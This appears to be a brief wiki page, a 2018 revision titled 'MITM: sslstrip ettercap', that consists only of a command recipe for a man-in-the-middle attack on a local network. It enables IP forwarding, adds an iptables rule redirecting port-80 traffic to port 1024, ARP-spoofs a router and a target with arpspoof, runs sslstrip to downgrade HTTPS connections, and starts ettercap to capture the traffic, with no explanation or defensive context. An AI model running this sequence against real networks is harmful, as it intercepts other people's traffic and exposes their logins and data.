MITM: sslstrip ettercap
Revision as of 12:19, 2 October 2018 by Onnowpurbo (talk | contribs)
sudo echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1024 sudo arpspoof -i [interface] -t [router ip, target ip] python sslstrip.py -l 1024 sudo ettercap -Tq -i [interface]